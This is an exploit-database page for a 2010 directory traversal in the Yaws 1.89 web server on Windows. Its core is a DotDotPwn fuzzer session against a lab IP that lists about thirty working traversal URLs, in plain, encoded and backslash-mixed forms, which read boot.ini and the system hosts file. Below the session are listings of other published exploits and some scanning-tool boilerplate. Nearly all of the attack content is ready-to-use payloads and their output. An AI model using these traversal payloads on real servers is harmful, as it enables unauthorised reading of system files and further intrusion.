Menu

Search for hundreds of thousands of exploits

"Yaws 1.89 - Directory Traversal"

Author

Exploit author

nitr0us

Platform

Exploit platform

windows

Release date

Exploit published date

2010-11-01

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
# Exploit Title: Yaws 1.89 Directory Traversal
# Date: 29 Oct
# Author: nitr0us (Alejandro Hernandez H.)
# Software Link: http://yaws.hyber.org/download/Yaws-1.89-windows-installer.exe
# Version: 1.89
# Tested on: Windows XP Service Pack 2

Chatsubo [(in)Security Dark] Labs
http://chatsubo-labs.blogspot.com
http://www.brainoverflow.org

EXPLOIT:
************************************************************************************
******* Released @ BugCon Security Conferences 2010 - http://www.bugcon.org ********
************************************************************************************

nitr0us@daiquiri ~ #./dotdotpwn.pl -m http -h 192.168.242.128 -O -s -d 3 -t 100 -q
#################################################################################
#                                                                               #
#  CubilFelino                                                       Chatsubo   #
#  Security Research Lab              and            [(in)Security Dark] Labs   #
#  chr1x.sectester.net                             chatsubo-labs.blogspot.com   #
#                                                                               #
#                               pr0udly present:                                #
#                                                                               #
#  ________            __  ________            __  __________                   #
#  \______ \    ____ _/  |_\______ \    ____ _/  |_\______   \__  _  __ ____    #
#   |    |  \  /  _ \\   __\|    |  \  /  _ \\   __\|     ___/\ \/ \/ //    \   #
#   |    `   \(  <_> )|  |  |    `   \(  <_> )|  |  |    |     \     /|   |  \  #
#  /_______  / \____/ |__| /_______  / \____/ |__|  |____|      \/\_/ |___|  /  #
#          \/                      \/                                      \/   #
#                               - DotDotPwn v2.1 -                              #
#                         The Directory Traversal Fuzzer                        #
#                         http://dotdotpwn.sectester.net                        #
#                            dotdotpwn@sectester.net                            #
#                                                                               #
#                              by chr1x & nitr0us                               #
#################################################################################


[========== TARGET INFORMATION ==========]
[+] Hostname: 192.168.242.128
[+] Detecting Operating System (nmap) ...
[+] Operating System detected:  Microsoft Windows XP SP2 or Windows Server 2003 SP0/SP1
[+] Protocol: http
[+] Port: 80
[+] Service detected:
Yaws/1.89 Yet Another Web Server
[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 3 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (windows)
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 2328

[=========== TESTING RESULTS ============]
[+] Ready to launch 10.00 traversals per second
[+] Press any key to start the testing (You can stop it pressing Ctrl + C)

[*] Testing Path: http://192.168.242.128:80/..\..\..\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..\..\..\windows\system32\drivers\etc\hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..%5c..%5c..%5cboot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/%2e%2e\%2e%2e\%2e%2e\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/%2e%2e\%2e%2e\%2e%2e\windows\system32\drivers\etc\hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..\\..\\..\\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..\\..\\..\\windows\\system32\\drivers\\etc\\hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..\\\..\\\..\\\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..\\\..\\\..\\\windows\\\system32\\\drivers\\\etc\\\hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..\/..\/..\/boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..\/..\/..\/windows\/system32\/drivers\/etc\/hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..\/\..\/\..\/\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/..\/\..\/\..\/\windows\/\system32\/\drivers\/\etc\/\hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/\../\../\../boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/\../\../\../windows/\system32/\drivers/\etc/\hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80//..\/..\/..\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80//..\/..\/..\windows\/system32\/drivers\/etc\/hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/.\..\.\..\.\..\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/.\..\.\..\.\..\windows\system32\drivers\etc\hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/.\\..\\.\\..\\.\\..\\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/.\\..\\.\\..\\.\\..\\windows\\system32\\drivers\\etc\\hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\..\..\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\..\..\windows\system32\drivers\etc\hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80////..\..\..\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80////..\..\..\windows///system32///drivers///etc///hosts <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/\\\..\..\..\boot.ini <- VULNERABLE!

[*] Testing Path: http://192.168.242.128:80/\\\..\..\..\windows\\\system32\\\drivers\\\etc\\\hosts <- VULNERABLE!

[+] Fuzz testing finished after 10.68 minutes (641 seconds)
[+] Total Traversals found: 30
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2015-08-12 "NeuroServer 0.7.4 - EEG TCP/IP Transceiver Remote Denial of Service" dos linux nitr0us
2015-04-21 "OpenBSD 5.6 - Multiple Local Kernel Panics (Denial of Service)" dos bsd nitr0us
2014-11-19 "Minix 3.3.0 - Remote TCP/IP Stack Denial of Service" dos linux nitr0us
2014-11-06 "Minix 3.3.0 - Local Denial of Service (PoC)" dos linux nitr0us
2014-10-25 "OpenBSD 5.5 - Local Kernel Panic (Denial of Service)" dos bsd nitr0us
2012-12-20 "IDA Pro 6.3 - Crash (PoC)" dos multiple nitr0us
2012-12-20 "gdb (GNU debugger) 7.5.1 - Null Pointer Dereference" dos linux nitr0us
2011-09-22 "Blue Coat Reporter - Directory Traversal" remote hardware nitr0us
2010-11-01 "Yaws 1.89 - Directory Traversal" remote windows nitr0us
2010-11-01 "Mongoose Web Server 2.11 - Directory Traversal" remote windows nitr0us
2009-09-25 "Cisco ACE XML Gateway 6.0 - Internal IP Disclosure" remote hardware nitr0us
2007-07-07 "NeoTracePro 3.25 - ActiveX 'TraceTarget()' Remote Buffer Overflow" remote windows nitr0us
2007-01-04 "Acunetix WVS 4.0 20060717 - HTTP Sniffer Component Remote Denial of Service" dos windows nitr0us
2006-05-26 "tiffsplit (libtiff 3.8.2) - Local Stack Buffer Overflow" local linux nitr0us
2006-04-02 "mpg123 0.59r - Malformed .mp3 (SIGSEGV) (PoC)" dos linux nitr0us
2005-09-12 "Snort 2.4.0 - SACK TCP Option Error Handling Denial of Service" dos multiple nitr0us 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected